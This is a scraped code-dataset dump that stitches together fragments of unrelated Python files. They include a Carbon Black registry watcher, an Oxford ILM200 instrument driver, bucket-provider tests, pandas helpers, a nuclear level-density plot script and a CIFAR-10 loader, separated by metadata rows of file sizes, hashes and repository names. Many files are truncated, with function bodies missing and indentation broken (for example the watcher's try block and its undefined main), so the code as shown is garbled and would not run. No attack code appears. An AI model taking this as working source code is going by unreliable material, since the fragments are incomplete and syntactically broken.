#The MIT License (MIT)
#
# Copyright (c) 2015 Bit9 + Carbon Black
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# -----------------------------------------------------------------------------
# Extension regmod watcher and grabber
#
# This script listens to the CB messaging bus for registry modification events,
# and when a modification is seen that matches a regular expression from a file
# of registry path regular expressions, it goes and grabs the registry value
# using CB Live Response.
#
# You need to make sure rabbitmq is enabled in cb.conf, and you might need to
# open a firewall rule for port 5004. You also will need to enable regmod
# in the DatastoreBroadcastEventTypes=<values> entry. If anything is changed
# here, you'll have to do service cb-enterprise restart.
#
# TODO: More error handling, more performance improvements
#
# last updated 2016-01-23 by Ben Johnson bjohnson@bit9.com (dev-support@bit9.com)
#
import re
import Queue
import sys
from threading import Thread
import time
import traceback
try:
from cbapi.legacy.util.cli_helpers import main_helper
from cbapi.legacy.util.composite_helpers import MessageSubscriberAndLiveResponseActor
import cbapi.legacy.util.sensor_events_pb2 as cpb
except ImportError:
from cbapi.util.cli_helpers import main_helper
from cbapi.util.composite_helpers import MessageSubscriberAndLiveResponseActor
import cbapi.util.sensor_events_pb2 as cpb
if __name__ == "__main__":
## YOU CAN USE data/autoruns_regexes.txt to test ##
required_args =[("-i", "--username", "store", None, "username", "CB messaging username"),
("-p", "--password", "store", None, "password", "CB messaging password"),
("-r", "--regpaths_file", "store", None, "regpaths_file", "File of newline delimited regexes for regpaths")]
optional_args = [("-v", "--verbose", "store_true", False, "verbose", "Enable verbose output")]
main_helper("Subscribe to message bus events and for each registry modification that matches one of our supplied regexes, go retrieve value.",
main,
custom_required=required_args,
custom_optional=optional_args)
| 42.980583 | 146 | 0.61588 |
fe509cc8fe00e2ec571d053ee6c5713299416d2c | 1,225 | py | Python | h/exceptions.py | ssin122/test-h | c10062ae23b690afaac0ab4af7b9a5a5e4b686a9 | [
"MIT"
] | 2 | 2021-11-07T23:14:54.000Z | 2021-11-17T10:11:55.000Z | h/exceptions.py | ssin122/test-h | c10062ae23b690afaac0ab4af7b9a5a5e4b686a9 | [
"MIT"
] | null | null | null | h/exceptions.py | ssin122/test-h | c10062ae23b690afaac0ab4af7b9a5a5e4b686a9 | [
"MIT"
] | 1 | 2017-03-12T00:18:33.000Z | 2017-03-12T00:18:33.000Z | # -*- coding: utf-8 -*-
"""Exceptions raised by the h application."""
from __future__ import unicode_literals
from h.i18n import TranslationString as _
# N.B. This class **only** covers exceptions thrown by API code provided by
# the h package. memex code has its own base APIError class.
| 27.222222 | 79 | 0.702041 |
fe52100e092cba8f28b9f872d87740877e78ee29 | 5,535 | py | Python | functest/opnfv_tests/openstack/shaker/shaker.py | opnfv-poc/functest | 4f54b282cabccef2a53e21c77c81b60fe890a8a4 | [
"Apache-2.0"
] | null | null | null | functest/opnfv_tests/openstack/shaker/shaker.py | opnfv-poc/functest | 4f54b282cabccef2a53e21c77c81b60fe890a8a4 | [
"Apache-2.0"
] | null | null | null | functest/opnfv_tests/openstack/shaker/shaker.py | opnfv-poc/functest | 4f54b282cabccef2a53e21c77c81b60fe890a8a4 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2018 Orange and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
"""
Shaker_ wraps around popular system network testing tools like iperf, iperf3
and netperf (with help of flent). Shaker is able to deploy OpenStack instances
and networks in different topologies. Shaker scenario specifies the deployment
and list of tests to execute.
.. _Shaker: http://pyshaker.readthedocs.io/en/latest/
"""
import logging
import os
import json
import scp
from functest.core import singlevm
from functest.utils import env
| 37.910959 | 79 | 0.605239 |
fe52c241e006580225be521c666de64401063758 | 410 | py | Python | lib/models/bn_helper.py | hongrui16/naic2020_B | 9321bdd19e7d2d47ac9c711eb8437cd364e25f44 | [
"MIT"
] | null | null | null | lib/models/bn_helper.py | hongrui16/naic2020_B | 9321bdd19e7d2d47ac9c711eb8437cd364e25f44 | [
"MIT"
] | null | null | null | lib/models/bn_helper.py | hongrui16/naic2020_B | 9321bdd19e7d2d47ac9c711eb8437cd364e25f44 | [
"MIT"
] | null | null | null | import torch
import functools
if torch.__version__.startswith('0'):
from .sync_bn.inplace_abn.bn import InPlaceABNSync
BatchNorm2d = functools.partial(InPlaceABNSync, activation='none')
BatchNorm2d_class = InPlaceABNSync
relu_inplace = False
else:
# BatchNorm2d_class = BatchNorm2d = torch.nn.SyncBatchNorm
BatchNorm2d_class = BatchNorm2d = torch.nn.BatchNorm2d
relu_inplace = True | 34.166667 | 70 | 0.770732 |
fe551b06355686622edde6ba5da6a8305143cb35 | 2,193 | py | Python | ordered_model/tests/models.py | HiddenClever/django-ordered-model | c94709403cfbb35fa4da3d6470ead816096fdec8 | [
"BSD-3-Clause"
] | null | null | null | ordered_model/tests/models.py | HiddenClever/django-ordered-model | c94709403cfbb35fa4da3d6470ead816096fdec8 | [
"BSD-3-Clause"
] | null | null | null | ordered_model/tests/models.py | HiddenClever/django-ordered-model | c94709403cfbb35fa4da3d6470ead816096fdec8 | [
"BSD-3-Clause"
] | null | null | null | from django.db import models
from ordered_model.models import OrderedModel, OrderedModelBase
| 29.24 | 117 | 0.735522 |
fe5674a5616780733e828478139977dd1166a1db | 2,288 | py | Python | library/pandas_utils.py | SACGF/variantgrid | 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | [
"RSA-MD"
] | 5 | 2021-01-14T03:34:42.000Z | 2022-03-07T15:34:18.000Z | library/pandas_utils.py | SACGF/variantgrid | 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | [
"RSA-MD"
] | 551 | 2020-10-19T00:02:38.000Z | 2022-03-30T02:18:22.000Z | library/pandas_utils.py | SACGF/variantgrid | 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | [
"RSA-MD"
] | null | null | null | import os
import sys
import numpy as np
import pandas as pd
def get_columns_percent_dataframe(df: pd.DataFrame, totals_column=None, percent_names=True) -> pd.DataFrame:
""" @param totals_column: (default = use sum of columns)
@param percent_names: Rename names from 'col' => 'col %'
Return a dataframe as a percentage of totals_column if provided, or sum of columns """
percent_df = pd.DataFrame(index=df.index)
columns = df.columns
if totals_column:
totals_series = df[totals_column]
columns = columns - [totals_column]
else:
totals_series = df.sum(axis=1)
for col in columns:
new_col = col
if percent_names:
new_col = f"{new_col} %"
multiplier = 100.0 # to get percent
percent_df[new_col] = multiplier * df[col] / totals_series
return percent_df
def get_rows_percent_dataframe(df: pd.DataFrame) -> pd.DataFrame:
""" Return a dataframe as a percentage of sum of rows """
row_sums = df.sum(axis=0)
return df.multiply(100.0) / row_sums
def get_total_percent_dataframe(df: pd.DataFrame) -> pd.DataFrame:
""" Return a dataframe as a percentage of sum of rows """
total = df.sum(axis=0).sum()
return df.multiply(100.0) / total
| 28.6 | 108 | 0.649913 |
fe56b7b7af27f780f7fa9407871404e8b6436b3d | 1,587 | py | Python | app/services/base.py | grace1307/lan_mapper | 5d244078732b86a2e38a5b21436ffca83c689eeb | [
"MIT"
] | null | null | null | app/services/base.py | grace1307/lan_mapper | 5d244078732b86a2e38a5b21436ffca83c689eeb | [
"MIT"
] | null | null | null | app/services/base.py | grace1307/lan_mapper | 5d244078732b86a2e38a5b21436ffca83c689eeb | [
"MIT"
] | null | null | null | from app.db import db
# Ignore it if db can't find the row when updating/deleting
# Todo: not ignore it, raise some error, remove checkers in view
| 28.339286 | 91 | 0.609326 |
fe56cfdabfdb2c62e991e0ff5887c5fa113a7477 | 694 | py | Python | set.py | QUDUSKUNLE/Python-Flask | 5990572b17923c976907c2fa5c2a9790f3a7c869 | [
"MIT"
] | null | null | null | set.py | QUDUSKUNLE/Python-Flask | 5990572b17923c976907c2fa5c2a9790f3a7c869 | [
"MIT"
] | null | null | null | set.py | QUDUSKUNLE/Python-Flask | 5990572b17923c976907c2fa5c2a9790f3a7c869 | [
"MIT"
] | null | null | null | """
How to set up virtual environment
pip install virtualenv
pip install virtualenvwrapper
# export WORKON_HOME=~/Envs
source /usr/local/bin/virtualenvwrapper.sh
# To activate virtualenv and set up flask
1. mkvirtualenv my-venv
###2. workon my-venv
3. pip install Flask
4. pip freeze
5. # To put all dependencies in a file
pip freeze > requirements.txt
6. run.py: entry point of the application
7. relational database management system
SQLite, MYSQL, PostgreSQL
SQLAlchemy is an Object Relational Mapper (ORM),
which means that it connects the objects of an application to tables in a
relational database management system.
""" | 30.173913 | 79 | 0.714697 |
fe5734aaedd2488a65c2f70b6e6de6bc38f3f4ec | 1,346 | py | Python | test/test_generate_data_coassembly.py | Badboy-16/SemiBin | 501bc1a7e310104c09475ca233a3f16d081f129a | [
"MIT"
] | null | null | null | test/test_generate_data_coassembly.py | Badboy-16/SemiBin | 501bc1a7e310104c09475ca233a3f16d081f129a | [
"MIT"
] | null | null | null | test/test_generate_data_coassembly.py | Badboy-16/SemiBin | 501bc1a7e310104c09475ca233a3f16d081f129a | [
"MIT"
] | null | null | null | from SemiBin.main import generate_data_single
import os
import pytest
import logging
import pandas as pd | 42.0625 | 80 | 0.604012 |
fe5794e6af44c9c1406d19b02f67dd498db59356 | 2,676 | py | Python | create/create_args_test.py | CarbonROM/android_tools_acloud | 0ed5352df639789767d8ea6fe0a510d7a84cfdcc | [
"Apache-2.0"
] | null | null | null | create/create_args_test.py | CarbonROM/android_tools_acloud | 0ed5352df639789767d8ea6fe0a510d7a84cfdcc | [
"Apache-2.0"
] | null | null | null | create/create_args_test.py | CarbonROM/android_tools_acloud | 0ed5352df639789767d8ea6fe0a510d7a84cfdcc | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 - The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for create."""
import unittest
from unittest import mock
from acloud import errors
from acloud.create import create_args
from acloud.internal import constants
from acloud.internal.lib import driver_test_lib
def _CreateArgs():
"""set default pass in arguments."""
mock_args = mock.MagicMock(
flavor=None,
num=1,
adb_port=None,
hw_property=None,
stable_cheeps_host_image_name=None,
stable_cheeps_host_image_project=None,
username=None,
password=None,
cheeps_betty_image=None,
local_image=None,
local_kernel_image=None,
local_system_image=None,
system_branch=None,
system_build_id=None,
system_build_target=None,
local_instance=None,
remote_host=None,
host_user=constants.GCE_USER,
host_ssh_private_key_path=None,
avd_type=constants.TYPE_CF,
autoconnect=constants.INS_KEY_VNC)
return mock_args
# pylint: disable=invalid-name,protected-access
if __name__ == "__main__":
unittest.main()
| 32.240964 | 74 | 0.702167 |
fe57a342e2e561171bed3dec28d69a69629da501 | 452 | py | Python | setup.py | Kannuki-san/msman | adc275ad0508d65753c8424e7f6b94becee0b855 | [
"MIT"
] | null | null | null | setup.py | Kannuki-san/msman | adc275ad0508d65753c8424e7f6b94becee0b855 | [
"MIT"
] | null | null | null | setup.py | Kannuki-san/msman | adc275ad0508d65753c8424e7f6b94becee0b855 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
from cx_Freeze import setup,Executable
icondata='icon.ico'
base = None
# GUI=, CUI=
if sys.platform == 'win32' : base = 'win32GUI'
exe = Executable(script = 'main.py',
base = base,
#icon=icondata
)
setup(name = 'MSman',
version = '0.1',
description = 'Minecraft Server Manager',
executables = [exe]
) | 17.384615 | 47 | 0.550885 |
fe57f5cf47823b7ec7c95916bb4e6edc61679b1b | 2,903 | py | Python | stereotype/roles.py | petee-d/stereotype | 33a2efc826fd907bd23ffb4e8f7cba119ff022ce | [
"MIT"
] | 6 | 2021-05-26T10:45:50.000Z | 2022-01-31T17:36:10.000Z | stereotype/roles.py | petee-d/stereotype | 33a2efc826fd907bd23ffb4e8f7cba119ff022ce | [
"MIT"
] | null | null | null | stereotype/roles.py | petee-d/stereotype | 33a2efc826fd907bd23ffb4e8f7cba119ff022ce | [
"MIT"
] | null | null | null | from __future__ import annotations
from threading import Lock
from typing import List, Set, Optional, Any, Tuple
from stereotype.utils import ConfigurationError
_roles: List[Role] = []
_roles_lock = Lock()
DEFAULT_ROLE = Role('default')
| 34.975904 | 111 | 0.654151 |
fe59e0ae9caf8657811351b2ce6b7040c6d723dc | 7,175 | py | Python | WEB21-1-12/WEB2/power/zvl_test.py | coderdq/vuetest | 28ea4f36e2c4e7e80d1ba1777ef312733ef84048 | [
"MIT"
] | null | null | null | WEB21-1-12/WEB2/power/zvl_test.py | coderdq/vuetest | 28ea4f36e2c4e7e80d1ba1777ef312733ef84048 | [
"MIT"
] | null | null | null | WEB21-1-12/WEB2/power/zvl_test.py | coderdq/vuetest | 28ea4f36e2c4e7e80d1ba1777ef312733ef84048 | [
"MIT"
] | null | null | null | # coding:utf-8
'''
VSWR
10marker
'''
import os
import logging
from commoninterface.zvlbase import ZVLBase
logger = logging.getLogger('ghost')
| 34.830097 | 108 | 0.557073 |
fe5a25378e13e098be2b1cdb76f7062e2c91b9b5 | 2,410 | py | Python | kshell/partial_level_density.py | ErlendLima/70Zn | 1bf73adec5a3960e195788bc1f4bc79b2086be64 | [
"MIT"
] | null | null | null | kshell/partial_level_density.py | ErlendLima/70Zn | 1bf73adec5a3960e195788bc1f4bc79b2086be64 | [
"MIT"
] | null | null | null | kshell/partial_level_density.py | ErlendLima/70Zn | 1bf73adec5a3960e195788bc1f4bc79b2086be64 | [
"MIT"
] | null | null | null | from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
import shellmodelutilities as smutil
# Set bin width and range
bin_width = 0.20
Emax = 14
Nbins = int(np.ceil(Emax/bin_width))
Emax_adjusted = bin_width*Nbins # Trick to get an integer number of bins
bins = np.linspace(0,Emax_adjusted,Nbins+1)
# Define list of calculation input files and corresponding label names
inputfile = "summary_Zn70_jun45.txt"
# Instantiate figure which we will fill
f_rho, ax_rho = plt.subplots(1,1)
# Read energy levels from file
levels = smutil.read_energy_levels(inputfile)
# Choose which [2*J,pi] combinations to include in partial level density plot
Jpi_list = [[0,-1],[2,-1],[4,-1],[6,-1],[8,-1],[10,-1],[12,-1],[14,-1],[16,-1],[18,-1],[20,-1],[22,-1],[24,-1],[26,-1],[28,-1],
[0,+1],[2,+1],[4,+1],[6,+1],[8,+1],[10,+1],[12,+1],[14,+1],[16,+1],[18,+1],[20,+1],[22,+1],[24,+1],[26,+1],[28,+1]]
# Allocate (Ex,Jpi) matrix to store partial level density
rho_ExJpi = np.zeros((Nbins,len(Jpi_list)))
# Count number of levels for each (Ex, J, pi) pixel.
Egs = levels[0,0] # Ground state energy
for i_l in range(len(levels[:,0])):
E, J, pi = levels[i_l]
# Skip if level is outside range:
if E-Egs >= Emax:
continue
i_Ex = int(np.floor((E-Egs)/bin_width))
try:
i_Jpi = Jpi_list.index([J,pi])
except:
continue
rho_ExJpi[i_Ex,i_Jpi] += 1
rho_ExJpi /= bin_width # Normalize to bin width, to get density in MeV^-1
# Plot it
from matplotlib.colors import LogNorm # To get log scaling on the z axis
colorbar_object = ax_rho.pcolormesh(np.linspace(0,len(Jpi_list)-1,len(Jpi_list)), bins, rho_ExJpi, norm=LogNorm())
f_rho.colorbar(colorbar_object) # Add colorbar to plot
# Make the plot nice
ax_rho.set_xlabel(r"$\pi\cdot J\,\mathrm{(\hbar)}$")
ax_rho.set_ylabel(r'$E_x \, \mathrm{(MeV)}$')
# A bit of Python voodoo to get the x labels right:
Jpi_array = np.append(np.linspace(0,-int((len(Jpi_list)-1)/2),int(len(Jpi_list)/2)),np.linspace(0,int((len(Jpi_list)-1)/2),int(len(Jpi_list)/2))) # Array of pi*J for plot
ax_rho.set_xlim([0,29])
ax_rho.xaxis.set_major_formatter(plt.FuncFormatter(format_func))
ax_rho.set_xticks([0,2,4,6,8,10,12,14,15,17,19,21,23,25,27])
# Show plot
plt.show()
| 34.927536 | 170 | 0.674274 |
fe5b20986b78369a49dfb31999fcc5213f36f3e2 | 15,480 | py | Python | tests/integration/test_provider_base.py | neuro-inc/platform-buckets-api | ba04edeb8565fa06e5af6d0316957a8816b087b2 | [
"Apache-2.0"
] | null | null | null | tests/integration/test_provider_base.py | neuro-inc/platform-buckets-api | ba04edeb8565fa06e5af6d0316957a8816b087b2 | [
"Apache-2.0"
] | 55 | 2021-11-16T00:26:52.000Z | 2022-03-29T03:16:55.000Z | tests/integration/test_provider_base.py | neuro-inc/platform-buckets-api | ba04edeb8565fa06e5af6d0316957a8816b087b2 | [
"Apache-2.0"
] | null | null | null | import abc
import secrets
from collections.abc import AsyncIterator, Awaitable, Callable, Mapping
from contextlib import AbstractAsyncContextManager, asynccontextmanager
from dataclasses import dataclass
from datetime import datetime, timezone
import pytest
from aiohttp import ClientSession
from yarl import URL
from platform_buckets_api.providers import (
BucketExistsError,
BucketNotExistsError,
BucketPermission,
BucketProvider,
RoleExistsError,
UserBucketOperations,
)
from platform_buckets_api.storage import ImportedBucket, ProviderBucket
BUCKET_NAME_PREFIX = "integration-tests-"
ROLE_NAME_PREFIX = "integration-tests-"
def as_admin_cm(
creator_func: Callable[[ProviderBucket], BasicBucketClient]
) -> Callable[[ProviderBucket], AbstractAsyncContextManager[BasicBucketClient]]:
return creator
# Access checkers
class TestProviderBase:
__test__ = False
| 35.022624 | 88 | 0.655749 |
fe5b28c8c0a814b5544650e3dacd259358d5495e | 4,972 | py | Python | sbpy/photometry/bandpass.py | jianyangli/sbpy | 6b79cbea9bada89207fba17d02dc0c321fa46bf4 | [
"BSD-3-Clause"
] | 1 | 2017-11-28T02:58:51.000Z | 2017-11-28T02:58:51.000Z | sbpy/photometry/bandpass.py | jianyangli/sbpy | 6b79cbea9bada89207fba17d02dc0c321fa46bf4 | [
"BSD-3-Clause"
] | null | null | null | sbpy/photometry/bandpass.py | jianyangli/sbpy | 6b79cbea9bada89207fba17d02dc0c321fa46bf4 | [
"BSD-3-Clause"
] | null | null | null | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
sbpy bandpass Module
"""
__all__ = [
'bandpass'
]
import os
from astropy.utils.data import get_pkg_data_filename
def bandpass(name):
"""Retrieve bandpass transmission spectrum from sbpy.
Parameters
----------
name : string
Name of the bandpass, case insensitive. See notes for
available filters.
Returns
-------
bp : `~synphot.SpectralElement`
Notes
-----
Available filters:
+-------------+---------------------------+
| Name | Source |
+=============+===========================+
| 2MASS J | Cohen et al. 2003 |
+-------------+---------------------------+
| 2MASS H | Cohen et al. 2003 |
+-------------+---------------------------+
| 2MASS Ks | Cohen et al. 2003 |
+-------------+---------------------------+
| Cousins R | STScI CDBS, v4 |
+-------------+---------------------------+
| Cousins I | STScI CDBS, v4 |
+-------------+---------------------------+
| Johnson U | STScI CDBS, v4 |
+-------------+---------------------------+
| Johnson B | STScI CDBS, v4 |
+-------------+---------------------------+
| Johnson V | STScI CDBS, v4 |
+-------------+---------------------------+
| PS1 g | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 r | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 i | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 w | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 y | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 z | Tonry et al. 2012 |
+-------------+---------------------------+
| SDSS u | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS g | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS r | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS i | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS z | SDSS, dated 2001 |
+-------------+---------------------------+
| WFC3 F438W | HST/WFC3 UVIS, v4 |
+-------------+---------------------------+
| WFC3 F606W | HST/WFC3 UVIS, v4 |
+-------------+---------------------------+
| WISE W1 | Jarrett et al. 2011 |
+-------------+---------------------------+
| WISE W2 | Jarrett et al. 2011 |
+-------------+---------------------------+
| WISE W3 | Jarrett et al. 2011 |
+-------------+---------------------------+
| WISE W4 | Jarrett et al. 2011 |
+-------------+---------------------------+
References
----------
.. [CDBS] Space Telescope Science Institute. HST Calibration Reference
Data System. https://hst-crds.stsci.edu/ .
.. [COH03] Cohen, M. et al. 2003. Spectral Irradiance Calibration
in the Infrared. XIV. The Absolute Calibration of 2MASS. AJ
126, 1090.
.. [JAR11] Jarrett, T. H. et al. 2011. The Spitzer-WISE Survey of
the Ecliptic Poles. ApJ 735, 112.
.. [SDSS] Sloan Digital Sky Survey. Camera.
www.sdss.org/instruments/camera .
.. [TON12] Tonry, J. L. et al. 2012. The Pan-STARRS1 Photometric
System. ApJ 750, 99.
"""
try:
import synphot
except ImportError:
raise ImportError('synphot is required.')
name2file = {
'2mass j': '2mass-j-rsr.txt',
'2mass h': '2mass-h-rsr.txt',
'2mass ks': '2mass-ks-rsr.txt',
'cousins r': 'cousins_r_004_syn.fits',
'cousins i': 'cousins_i_004_syn.fits',
'johnson u': 'johnson_u_004_syn.fits',
'johnson b': 'johnson_b_004_syn.fits',
'johnson v': 'johnson_v_004_syn.fits',
'ps1 g': 'ps1-gp1.txt',
'ps1 r': 'ps1-rp1.txt',
'ps1 i': 'ps1-ip1.txt',
'ps1 w': 'ps1-wp1.txt',
'ps1 y': 'ps1-yp1.txt',
'ps1 z': 'ps1-zp1.txt',
'sdss u': 'sdss-u.fits',
'sdss g': 'sdss-g.fits',
'sdss r': 'sdss-r.fits',
'sdss i': 'sdss-i.fits',
'sdss z': 'sdss-z.fits',
'wfc3 f438w': 'wfc3_uvis_f438w_004_syn.fits',
'wfc3 f606w': 'wfc3_uvis_f606w_004_syn.fits',
'wise w1': 'WISE-RSR-W1.EE.txt',
'wise w2': 'WISE-RSR-W2.EE.txt',
'wise w3': 'WISE-RSR-W3.EE.txt',
'wise w4': 'WISE-RSR-W4.EE.txt',
}
fn = get_pkg_data_filename(os.path.join(
'..', 'photometry', 'data', name2file[name.lower()]))
bp = synphot.SpectralElement.from_file(fn)
return bp
| 34.054795 | 75 | 0.377715 |
fe5bf9f4fe33b1e74de5e5a8a91381afcd0d937c | 576 | py | Python | appserver/search/views.py | sinag/SWE574-Horuscope | 9725dd356cbfd19f0ce88d4a208c872be765bd88 | [
"MIT"
] | null | null | null | appserver/search/views.py | sinag/SWE574-Horuscope | 9725dd356cbfd19f0ce88d4a208c872be765bd88 | [
"MIT"
] | null | null | null | appserver/search/views.py | sinag/SWE574-Horuscope | 9725dd356cbfd19f0ce88d4a208c872be765bd88 | [
"MIT"
] | 1 | 2020-08-07T12:54:51.000Z | 2020-08-07T12:54:51.000Z | from django.http import HttpResponse
from django.shortcuts import render, redirect
from community.models import Community
# Create your views here.
| 30.315789 | 88 | 0.744792 |
fe5c54cf485f5924948c2f9e92bdf0e6152fda9f | 1,566 | py | Python | teams/migrations/0001_initial.py | Sudani-Coder/teammanager | 857082bc14d7a783d2327b4e982edba7c061f303 | [
"MIT"
] | null | null | null | teams/migrations/0001_initial.py | Sudani-Coder/teammanager | 857082bc14d7a783d2327b4e982edba7c061f303 | [
"MIT"
] | null | null | null | teams/migrations/0001_initial.py | Sudani-Coder/teammanager | 857082bc14d7a783d2327b4e982edba7c061f303 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.2 on 2020-10-18 17:19
from django.db import migrations, models
| 36.418605 | 141 | 0.541507 |
fe5c97158341c4d0d209389c3a2affb30b2d34bf | 9,772 | py | Python | qcodes_contrib_drivers/drivers/Oxford/ILM200.py | jenshnielsen/Qcodes_contrib_drivers | dc878cdd99a62f4643a62163a3a6341f98cee440 | [
"MIT"
] | null | null | null | qcodes_contrib_drivers/drivers/Oxford/ILM200.py | jenshnielsen/Qcodes_contrib_drivers | dc878cdd99a62f4643a62163a3a6341f98cee440 | [
"MIT"
] | 2 | 2020-05-29T11:00:52.000Z | 2020-10-09T06:18:11.000Z | qcodes_contrib_drivers/drivers/Oxford/ILM200.py | jenshnielsen/Qcodes_contrib_drivers | dc878cdd99a62f4643a62163a3a6341f98cee440 | [
"MIT"
] | 1 | 2020-04-24T01:15:44.000Z | 2020-04-24T01:15:44.000Z | # OxfordInstruments_ILM200.py class, to perform the communication between the Wrapper and the device
# Copyright (c) 2017 QuTech (Delft)
# Code is available under the available under the `MIT open-source license <https://opensource.org/licenses/MIT>`__
#
# Pieter Eendebak <pieter.eendebak@tno.nl>, 2017
# Takafumi Fujita <t.fujita@tudelft.nl>, 2016
# Guenevere Prawiroatmodjo <guen@vvtp.tudelft.nl>, 2009
# Pieter de Groot <pieterdegroot@gmail.com>, 2009
from time import sleep
import visa
import logging
from qcodes import VisaInstrument
| 32.144737 | 115 | 0.556283 |
fe5cdd0275ff0c38add8e228ff02333ee397a98c | 4,417 | py | Python | load_cifar_10.py | xgxofdream/CNN-Using-Local-CIFAR-10-dataset | 8076056da58a5b564ded50f4cdb059585deb900d | [
"Apache-2.0"
] | null | null | null | load_cifar_10.py | xgxofdream/CNN-Using-Local-CIFAR-10-dataset | 8076056da58a5b564ded50f4cdb059585deb900d | [
"Apache-2.0"
] | null | null | null | load_cifar_10.py | xgxofdream/CNN-Using-Local-CIFAR-10-dataset | 8076056da58a5b564ded50f4cdb059585deb900d | [
"Apache-2.0"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
import pickle
"""
The CIFAR-10 dataset consists of 60000 32x32 colour images in 10 classes, with 6000 images per class. There are 50000
training images and 10000 test images.
The dataset is divided into five training batches and one test batch, each with 10000 images. The test batch contains
exactly 1000 randomly-selected images from each class. The training batches contain the remaining images in random
order, but some training batches may contain more images from one class than another. Between them, the training
batches contain exactly 5000 images from each class.
"""
def unpickle(file):
"""load the cifar-10 data"""
with open(file, 'rb') as fo:
data = pickle.load(fo, encoding='bytes')
return data
def load_cifar_10_data(data_dir, negatives=False):
"""
Return train_data, train_filenames, train_labels, test_data, test_filenames, test_labels
"""
# get the meta_data_dict
# num_cases_per_batch: 1000
# label_names: ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']
# num_vis: :3072
meta_data_dict = unpickle(data_dir + "/batches.meta")
cifar_label_names = meta_data_dict[b'label_names']
cifar_label_names = np.array(cifar_label_names)
# training data
cifar_train_data = None
cifar_train_filenames = []
cifar_train_labels = []
# cifar_train_data_dict
# 'batch_label': 'training batch 5 of 5'
# 'data': ndarray
# 'filenames': list
# 'labels': list
for i in range(1, 6):
cifar_train_data_dict = unpickle(data_dir + "/data_batch_{}".format(i))
if i == 1:
cifar_train_data = cifar_train_data_dict[b'data']
else:
cifar_train_data = np.vstack((cifar_train_data, cifar_train_data_dict[b'data']))
cifar_train_filenames += cifar_train_data_dict[b'filenames']
cifar_train_labels += cifar_train_data_dict[b'labels']
cifar_train_data = cifar_train_data.reshape((len(cifar_train_data), 3, 32, 32))
if negatives:
cifar_train_data = cifar_train_data.transpose(0, 2, 3, 1).astype(np.float32)
else:
cifar_train_data = np.rollaxis(cifar_train_data, 1, 4)
cifar_train_filenames = np.array(cifar_train_filenames)
cifar_train_labels = np.array(cifar_train_labels)
# test data
# cifar_test_data_dict
# 'batch_label': 'testing batch 1 of 1'
# 'data': ndarray
# 'filenames': list
# 'labels': list
cifar_test_data_dict = unpickle(data_dir + "/test_batch")
cifar_test_data = cifar_test_data_dict[b'data']
cifar_test_filenames = cifar_test_data_dict[b'filenames']
cifar_test_labels = cifar_test_data_dict[b'labels']
cifar_test_data = cifar_test_data.reshape((len(cifar_test_data), 3, 32, 32))
if negatives:
cifar_test_data = cifar_test_data.transpose(0, 2, 3, 1).astype(np.float32)
else:
cifar_test_data = np.rollaxis(cifar_test_data, 1, 4)
cifar_test_filenames = np.array(cifar_test_filenames)
cifar_test_labels = np.array(cifar_test_labels)
return cifar_train_data, cifar_train_filenames, cifar_train_labels, \
cifar_test_data, cifar_test_filenames, cifar_test_labels, cifar_label_names
if __name__ == "__main__":
"""show it works"""
cifar_10_dir = '.\cifar10-dataset'
train_data, train_filenames, train_labels, test_data, test_filenames, test_labels, label_names = \
load_cifar_10_data(cifar_10_dir)
print("Train data: ", train_data.shape)
print("Train filenames: ", train_filenames.shape)
print("Train labels: ", train_labels.shape)
print("Test data: ", test_data.shape)
print("Test filenames: ", test_filenames.shape)
print("Test labels: ", test_labels.shape)
print("Label names: ", label_names.shape)
# Don't forget that the label_names and filesnames are in binary and need conversion if used.
# display some random training images in a 25x25 grid
num_plot = 5
f, ax = plt.subplots(num_plot, num_plot)
for m in range(num_plot):
for n in range(num_plot):
idx = np.random.randint(0, train_data.shape[0])
ax[m, n].imshow(train_data[idx])
ax[m, n].get_xaxis().set_visible(False)
ax[m, n].get_yaxis().set_visible(False)
f.subplots_adjust(hspace=0.1)
